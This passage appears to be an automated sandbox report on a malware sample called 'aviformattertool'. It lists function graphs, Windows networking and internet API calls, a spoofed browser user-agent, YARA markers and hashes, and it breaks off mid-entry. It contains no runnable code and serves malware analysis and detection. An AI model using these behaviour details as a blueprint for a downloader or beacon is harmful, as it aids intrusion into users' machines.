                                                                                                                                                          control_flow_graph 623 2a17bd4-2a17be3 624 2a17be5-2a17c00 623->624 625 2a17b6d-2a17b7e 623->625 630 2a17c02-2a17c0e 624->630 631 2a17c5a-2a17c67 624->631 626 2a17b84-2a17b97 call 2a1442e 625->626 627 2a17b7f call 2a24a70 625->627 635 2a17ba0-2a17ba7 call 2a22ef4 626->635 636 2a17b99-2a17b9b call 2a153df 626->636 627->626 633 2a17c10-2a17c21 630->633 634 2a17c6b-2a17c7b 630->634 631->634 641 2a16745-2a16747 635->641 636->635 642 2a16750-2a16752 641->642 643 2a16749-2a1674e 641->643 645 2a16754 642->645 646 2a1675f-2a16793 RtlEnterCriticalSection RtlLeaveCriticalSection 642->646 644 2a16759 Sleep 643->644 644->646 645->644 647 2a167e3 646->647 648 2a16795-2a167a1 646->648 649 2a167e7-2a17314 InternetOpenA 647->649 648->647 650 2a167a3-2a167b0 648->650 655 2a173da-2a173e0 649->655 656 2a1731a-2a17391 InternetSetOptionA * 3 call 2a24a70 InternetOpenUrlA 649->656 651 2a167b2-2a167b6 650->651 652 2a167b8-2a167b9 650->652 654 2a167bd-2a167e1 call 2a24a70 * 2 651->654 652->654 654->649 657 2a173e2-2a173e8 655->657 658 2a173fc-2a1740a 655->658 666 2a173d3-2a173d4 InternetCloseHandle 656->666 667 2a17393 656->667 662 2a173ea-2a173ec 657->662 663 2a173ee-2a173fb call 2a1547e 657->663 658->641 665 2a17410-2a17434 call 2a24a70 call 2a1442e 658->665 662->658 663->658 665->641 679 2a1743a-2a17468 RtlEnterCriticalSection RtlLeaveCriticalSection call 2a222bc 665->679 666->655 671 2a17397-2a173bd InternetReadFile 667->671 676 2a173c8-2a173cf InternetCloseHandle 671->676 677 2a173bf-2a173c6 671->677 676->666 677->671 682 2a1746a-2a1747c call 2a222bc 679->682 683 2a174be-2a174d9 call 2a222bc 679->683 682->683 690 2a1747e-2a17490 call 2a222bc 682->690 688 2a17793-2a177a5 call 2a222bc 683->688 689 2a174df-2a174e1 683->689 697 2a177a7-2a177a9 688->697 698 2a177ee-2a17800 call 2a222bc 688->698 689->688 692 2a174e7-2a17599 call 2a22f2c RtlEnterCriticalSection RtlLeaveCriticalSection call 2a24a70 * 5 call 2a1442e * 2 689->692 690->683 700 2a17492-2a174a4 call 2a222bc 690->700 753 2a175d6 692->753 754 2a1759b-2a1759d 692->754 697->698 701 2a177ab-2a177e9 call 2a24a70 RtlEnterCriticalSection RtlLeaveCriticalSection 697->701 711 2a17821-2a17833 call 2a222bc 698->711 712 2a17802-2a17810 call 2a16246 call 2a16354 698->712 700->683 713 2a174a6-2a174b8 call 2a222bc 700->713 701->641 723 2a17b51-2a17b63 call 2a222bc 711->723 724 2a17839-2a1783b 711->724 726 2a17815-2a1781c call 2a1645f 712->726 713->641 713->683 723->641 736 2a17b69-2a17b7f call 2a22f2c call 2a24a70 723->736 724->723 728 2a17841-2a17858 call 2a1442e 724->728 726->641 728->641 740 2a1785e-2a1792c call 2a22398 call 2a11ba7 728->740 736->626 751 2a17933-2a17954 RtlEnterCriticalSection 740->751 752 2a1792e call 2a1143f 740->752 756 2a17960-2a179c4 RtlLeaveCriticalSection call 2a13c67 call 2a13d7e call 2a182bb 751->756 757 2a17956-2a1795d 751->757 752->751 759 2a175da-2a17608 call 2a22f2c call 2a24a70 call 2a1442e 753->759 754->753 758 2a1759f-2a175b1 call 2a222bc 754->758 779 2a17b38-2a17b4c call 2a18f83 756->779 780 2a179ca-2a17a12 call 2a1a6a5 756->780 757->756 758->753 768 2a175b3-2a175d4 call 2a1442e 758->768 777 2a17649-2a17652 call 2a22ef4 759->777 778 2a1760a-2a17619 call 2a23566 759->778 768->759 789 2a17789-2a1778c 777->789 790 2a17658-2a17670 call 2a23acc 777->790 778->777 791 2a1761b 778->791 779->641 792 2a17b02-2a17b33 call 2a1836a call 2a133b2 780->792 793 2a17a18-2a17a1f 780->793 789->688 803 2a17672-2a1767a call 2a196b7 790->803 804 2a1767c 790->804 796 2a17620-2a17632 call 2a227d0 791->796 792->779 794 2a17a22-2a17a27 793->794 794->794 798 2a17a29-2a17a74 call 2a1a6a5 794->798 810 2a17634 796->810 811 2a17637-2a17647 call 2a23566 796->811 798->792 812 2a17a7a-2a17a80 798->812 809 2a1767e-2a17720 call 2a1a7cf call 2a13863 call 2a151ab call 2a13863 call 2a1aa75 call 2a1ab8f 803->809 804->809 834 2a17725-2a17736 809->834 810->811 811->777 811->796 816 2a17a83-2a17a88 812->816 816->816 819 2a17a8a-2a17ac5 call 2a1a6a5 816->819 819->792 826 2a17ac7-2a17afb call 2a1d097 819->826 830 2a17b00-2a17b01 826->830 830->792 835 2a17738 call 2a1380b 834->835 836 2a1773d-2a17768 Sleep call 2a21870 834->836 835->836 840 2a17774-2a17782 836->840 841 2a1776a-2a17773 call 2a14100 836->841 840->789 842 2a17784 call 2a1380b 840->842 841->840 842->789
                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNELBASE(0000EA60), ref: 02A16759
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(02A471CC), ref: 02A16764
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02A471CC), ref: 02A16775
                                                                                                                                                          • _free.LIBCMT ref: 02A17BA1
                                                                                                                                                          Strings
                                                                                                                                                          • urls, xrefs: 02A17B87
                                                                                                                                                          • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02A1678A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeaveSleep_free
                                                                                                                                                          • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$urls
                                                                                                                                                          • API String ID: 2653569029-4235545730
                                                                                                                                                          • Opcode ID: 781a41c46c1430b5d680fe173145c7247270383075dfe0a137bba7870ee07f3c
                                                                                                                                                          • Instruction ID: e3cde9cacf6bb60b21dfa41ebe8dcf4516083b283b57a8a9e2b8d717d7ae8d67
                                                                                                                                                          • Opcode Fuzzy Hash: 781a41c46c1430b5d680fe173145c7247270383075dfe0a137bba7870ee07f3c
                                                                                                                                                          • Instruction Fuzzy Hash: D0315B729083909FD7119B389D8475BBBA1EF87730F14049DF5929B282DF609846C796
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A126DB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92timeCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02A12706
                                                                                                                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02A1272B
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02A35AD3), ref: 02A12738
                                                                                                                                                            • Part of subcall function 02A11712: __EH_prolog.LIBCMT ref: 02A11717
                                                                                                                                                          • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02A12778
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02A127D9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                                                                          • String ID: timer
                                                                                                                                                          • API String ID: 4293676635-1792073242
                                                                                                                                                          • Opcode ID: b8c65b3f222d0b9676795beaf6eafc05392d9e7f329b1527e3d86d97a643d8a6
                                                                                                                                                          • Instruction ID: f137d2d2bf49c6e8c367a073c137ba5dabe48ee8db376f8fcc8e7a6e86e3101e
                                                                                                                                                          • Opcode Fuzzy Hash: b8c65b3f222d0b9676795beaf6eafc05392d9e7f329b1527e3d86d97a643d8a6
                                                                                                                                                          • Instruction Fuzzy Hash: DC317AB1944716EFD310DF25CA84B27BBE8FF49764F004A2AF95582A80EB70E815CF91
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A12B95 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132networkCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 897 2a12b95-2a12baf 898 2a12bb1-2a12bb9 call 2a20a90 897->898 899 2a12bc7-2a12bcb 897->899 906 2a12bbf-2a12bc2 898->906 901 2a12bcd-2a12bd0 899->901 902 2a12bdf 899->902 901->902 904 2a12bd2-2a12bdd call 2a20a90 901->904 905 2a12be2-2a12c11 WSASetLastError WSARecv call 2a1a489 902->905 904->906 911 2a12c16-2a12c1d 905->911 909 2a12d30 906->909 914 2a12d32-2a12d38 909->914 912 2a12c2c-2a12c32 911->912 913 2a12c1f-2a12c2a call 2a20a90 911->913 916 2a12c34-2a12c39 call 2a20a90 912->916 917 2a12c46-2a12c48 912->917 922 2a12c3f-2a12c42 913->922 916->922 920 2a12c4a-2a12c4d 917->920 921 2a12c4f-2a12c60 call 2a20a90 917->921 924 2a12c66-2a12c69 920->924 921->914 921->924 922->917 927 2a12c73-2a12c76 924->927 928 2a12c6b-2a12c6d 924->928 927->909 929 2a12c7c-2a12c9a call 2a20a90 call 2a1166f 927->929 928->927 930 2a12d22-2a12d2d call 2a11996 928->930 937 2a12cbc-2a12cfa WSASetLastError select call 2a1a489 929->937 938 2a12c9c-2a12cba call 2a20a90 call 2a1166f 929->938 930->909 944 2a12d08 937->944 945 2a12cfc-2a12d06 call 2a20a90 937->945 938->909 938->937 946 2a12d15-2a12d17 944->946 947 2a12d0a-2a12d12 call 2a20a90 944->947 951 2a12d19-2a12d1d 945->951 946->909 946->951 947->946 951->905
                                                                                                                                                          APIs
                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 02A12BE4
                                                                                                                                                          • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02A12C07
                                                                                                                                                            • Part of subcall function 02A1A489: WSAGetLastError.WS2_32(00000000,?,?,02A12A51), ref: 02A1A497
                                                                                                                                                          • WSASetLastError.WS2_32 ref: 02A12CD3
                                                                                                                                                          • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02A12CE7
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$Recvselect
                                                                                                                                                          • String ID: 3'
                                                                                                                                                          • API String ID: 886190287-280543908
                                                                                                                                                          • Opcode ID: fc8158c8161d1483ed6d2d61a001a317f271c27a25e7468e0aa56db3c9f86c2a
                                                                                                                                                          • Instruction ID: 7c2a8ae1fca64dec61dfb894410c480e5921474a43ba0e4e8316224f8f127319
                                                                                                                                                          • Opcode Fuzzy Hash: fc8158c8161d1483ed6d2d61a001a317f271c27a25e7468e0aa56db3c9f86c2a
                                                                                                                                                          • Instruction Fuzzy Hash: 3A418AB1A083168FD7209F74CA4476BBBE9AF88364F10091EE999C7280EF70D544CB92
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00402F22 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetVersion.KERNEL32 ref: 00402F48
                                                                                                                                                            • Part of subcall function 0040325A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                                                                                                            • Part of subcall function 0040325A: HeapDestroy.KERNEL32 ref: 004032AA
                                                                                                                                                          • GetCommandLineA.KERNEL32 ref: 00402F96
                                                                                                                                                          • GetStartupInfoA.KERNEL32(?), ref: 00402FC1
                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FE4
                                                                                                                                                            • Part of subcall function 0040303D: ExitProcess.KERNEL32 ref: 0040305A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                                                                          • String ID: x5}
                                                                                                                                                          • API String ID: 2057626494-690368461
                                                                                                                                                          • Opcode ID: c877abccd7b017b2008373a683c45a85b37785b71fb7751b95783a0f91bffb14
                                                                                                                                                          • Instruction ID: cc19e24f17b4650914cb2b9af9e4d353f3e23d4ad16f4765f21c486f210011ea
                                                                                                                                                          • Opcode Fuzzy Hash: c877abccd7b017b2008373a683c45a85b37785b71fb7751b95783a0f91bffb14
                                                                                                                                                          • Instruction Fuzzy Hash: F5219CB09407059ADB08EFA6DE09A6E7BB9EB44304F10413EFA05BB2D1DB384450DB99
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A129EE Relevance: 7.6, APIs: 5, Instructions: 79networkCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1033 2a129ee-2a12a06 1034 2a12ab3-2a12abb call 2a20a90 1033->1034 1035 2a12a0c-2a12a10 1033->1035 1043 2a12abe-2a12ac6 1034->1043 1037 2a12a12-2a12a15 1035->1037 1038 2a12a39-2a12a4c WSASetLastError closesocket call 2a1a489 1035->1038 1037->1038 1039 2a12a17-2a12a36 call 2a20a90 call 2a12f50 1037->1039 1044 2a12a51-2a12a55 1038->1044 1039->1038 1044->1034 1046 2a12a57-2a12a5f call 2a20a90 1044->1046 1051 2a12a61-2a12a67 1046->1051 1052 2a12a69-2a12a71 call 2a20a90 1046->1052 1051->1052 1053 2a12a7b-2a12aad ioctlsocket WSASetLastError closesocket call 2a1a489 1051->1053 1058 2a12a73-2a12a79 1052->1058 1059 2a12aaf-2a12ab1 1052->1059 1053->1059 1058->1053 1058->1059 1059->1034 1059->1043
                                                                                                                                                          APIs
                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 02A12A3B
                                                                                                                                                          • closesocket.WS2_32 ref: 02A12A42
                                                                                                                                                          • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02A12A89
                                                                                                                                                          • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02A12A97
                                                                                                                                                          • closesocket.WS2_32 ref: 02A12A9E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastclosesocket$ioctlsocket
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1561005644-0
                                                                                                                                                          • Opcode ID: d29cfdb8e1a95843effa95dc232d8bd60f02b5f34a146c60aa45c92cfd3dd80e
                                                                                                                                                          • Instruction ID: 778d08f6d09e3bdb80be6d4586568dc929f59e5c9dad8487f78920757a1cfeda
                                                                                                                                                          • Opcode Fuzzy Hash: d29cfdb8e1a95843effa95dc232d8bd60f02b5f34a146c60aa45c92cfd3dd80e
                                                                                                                                                          • Instruction Fuzzy Hash: 462108B1A00225AFDB209BF89E44B6AB7E9AF44325F14456AEC15C3181EF70C945CB50
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A11BA7 Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 1060 2a11ba7-2a11bcf call 2a35370 RtlEnterCriticalSection 1063 2a11bd1 1060->1063 1064 2a11be9-2a11bf7 RtlLeaveCriticalSection call 2a1e2b0 1060->1064 1065 2a11bd4-2a11be0 call 2a11b79 1063->1065 1067 2a11bfa-2a11c20 RtlEnterCriticalSection 1064->1067 1072 2a11be2-2a11be7 1065->1072 1073 2a11c55-2a11c6e RtlLeaveCriticalSection 1065->1073 1069 2a11c34-2a11c36 1067->1069 1070 2a11c22-2a11c2f call 2a11b79 1069->1070 1071 2a11c38-2a11c43 1069->1071 1075 2a11c45-2a11c4b 1070->1075 1078 2a11c31 1070->1078 1071->1075 1072->1064 1072->1065 1075->1073 1077 2a11c4d-2a11c51 1075->1077 1077->1073 1078->1069
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A11BAC
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL ref: 02A11BBC
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL ref: 02A11BEA
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL ref: 02A11C13
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL ref: 02A11C56
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1633115879-0
                                                                                                                                                          • Opcode ID: 17c9b8cfa008b00e59fefad76b092d30c6b58d4c62b16a2e57679dd549d54a30
                                                                                                                                                          • Instruction ID: 067db88ed899c7821b0dbf48f5e534cfd7d072d81d0bd1e8598130755bbd011d
                                                                                                                                                          • Opcode Fuzzy Hash: 17c9b8cfa008b00e59fefad76b092d30c6b58d4c62b16a2e57679dd549d54a30
                                                                                                                                                          • Instruction Fuzzy Hash: 0E219CB5A04204EFCB14CF68C984B9ABBB5FF48724F108589F95997301DB74E901CBE0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A12EDD Relevance: 6.0, APIs: 4, Instructions: 49networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 02A12EEE
                                                                                                                                                          • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02A12EFD
                                                                                                                                                          • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02A12F0C
                                                                                                                                                          • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02A12F36
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$Socketsetsockopt
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2093263913-0
                                                                                                                                                          • Opcode ID: d3e1cd8153d323655fc045ddd66cc18c795bcd19733bdea5fdfc0ca11e54f701
                                                                                                                                                          • Instruction ID: 8dc5c3a72ce83609b71e55a83d83964ffb1730d7e0c5b67dbc93e487416c9219
                                                                                                                                                          • Opcode Fuzzy Hash: d3e1cd8153d323655fc045ddd66cc18c795bcd19733bdea5fdfc0ca11e54f701
                                                                                                                                                          • Instruction Fuzzy Hash: 29018871A40218BBDB205F65DC89F5AFBA9EB89771F008565F908CB181DB70C800CBB0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A12DB5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 02A12D39: WSASetLastError.WS2_32(00000000), ref: 02A12D47
                                                                                                                                                            • Part of subcall function 02A12D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02A12D5C
                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 02A12E6D
                                                                                                                                                          • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02A12E83
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$Sendselect
                                                                                                                                                          • String ID: 3'
                                                                                                                                                          • API String ID: 2958345159-280543908
                                                                                                                                                          • Opcode ID: b92d829a1a5a417f3ae8313a7549d93bd9b38a8a2dd086b9fa4c11471c25f148
                                                                                                                                                          • Instruction ID: 202a41564cc52e5b1f250887b4af1338cefca47be107e1f7572deab8c67303d3
                                                                                                                                                          • Opcode Fuzzy Hash: b92d829a1a5a417f3ae8313a7549d93bd9b38a8a2dd086b9fa4c11471c25f148
                                                                                                                                                          • Instruction Fuzzy Hash: 24319CB1A003299FDB10DFA4CA45BEEBBBAAF44364F00455AEC0997280EF75D555CFA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A12AC7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • WSASetLastError.WS2_32(00000000), ref: 02A12AEA
                                                                                                                                                          • connect.WS2_32(?,?,?), ref: 02A12AF5
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastconnect
                                                                                                                                                          • String ID: 3'
                                                                                                                                                          • API String ID: 374722065-280543908
                                                                                                                                                          • Opcode ID: 7320aa1ffc7674b43a5d8e2a38db0f2d8a1fe248f4a092503679018f1676a6d6
                                                                                                                                                          • Instruction ID: e3cbe60a904578b8fae52b0d406634652c90f80d9d5e919fe0b34dee9c0d1d03
                                                                                                                                                          • Opcode Fuzzy Hash: 7320aa1ffc7674b43a5d8e2a38db0f2d8a1fe248f4a092503679018f1676a6d6
                                                                                                                                                          • Instruction Fuzzy Hash: E2219571E04228ABDF10AFA8D644BAEBBBAAF44334F408559DD1997280DF7486058F91
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1353E Relevance: 4.6, APIs: 3, Instructions: 127COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                          • Opcode ID: 242f454b31694836ed88af497b077f96117424d02d46ac310c457707d021d829
                                                                                                                                                          • Instruction ID: a937d84ba98abff2f52c71517075d7e1b9993a81d13a8787e51854528894f5ad
                                                                                                                                                          • Opcode Fuzzy Hash: 242f454b31694836ed88af497b077f96117424d02d46ac310c457707d021d829
                                                                                                                                                          • Instruction Fuzzy Hash: 93511CB190421ADFCF05DF68D5416AABBB1FF08720F14819EE8699B390DB74D911CFA1
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A1369A Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 02A136A7
                                                                                                                                                            • Part of subcall function 02A12420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02A12432
                                                                                                                                                            • Part of subcall function 02A12420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02A12445
                                                                                                                                                            • Part of subcall function 02A12420: RtlEnterCriticalSection.NTDLL(?), ref: 02A12454
                                                                                                                                                            • Part of subcall function 02A12420: InterlockedExchange.KERNEL32(?,00000001), ref: 02A12469
                                                                                                                                                            • Part of subcall function 02A12420: RtlLeaveCriticalSection.NTDLL(?), ref: 02A12470
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1601054111-0
                                                                                                                                                          • Opcode ID: 2eca777068375a302df32815ebea06d89d8fdfa21aa1c4d587043d6559b77fc4
                                                                                                                                                          • Instruction ID: 1138e441cade9fae6c64430c1dc3a56d2758dad5124a6bb54bf2572a9098028f
                                                                                                                                                          • Opcode Fuzzy Hash: 2eca777068375a302df32815ebea06d89d8fdfa21aa1c4d587043d6559b77fc4
                                                                                                                                                          • Instruction Fuzzy Hash: 7611C1B6200209EBDF21DF14DC85FAA3B6AEF00364F104556FE5286290CF34D860CB94
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A22070 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __beginthreadex.LIBCMT ref: 02A22086
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02A1A909,00000000), ref: 02A220B7
                                                                                                                                                          • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02A1A909,00000000), ref: 02A220C5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleResumeThread__beginthreadex
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1685284544-0
                                                                                                                                                          • Opcode ID: d7da254c6c102081a36e4c7ebe7cd884926f3691bf451790edd4c5b0bd361c05
                                                                                                                                                          • Instruction ID: 2219368c44ac0ab29a0021074586bed32f473870446bad5a18f67bf826970133
                                                                                                                                                          • Opcode Fuzzy Hash: d7da254c6c102081a36e4c7ebe7cd884926f3691bf451790edd4c5b0bd361c05
                                                                                                                                                          • Instruction Fuzzy Hash: 23F0C271240210ABE7309F6CDCC0F91B3E9AF49724F24456AF944D7284CB71EC9ACA90
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 02A11AA9 Relevance: 4.5, APIs: 3, Instructions: 18networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InterlockedIncrement.KERNEL32(02A472A0), ref: 02A11ABA
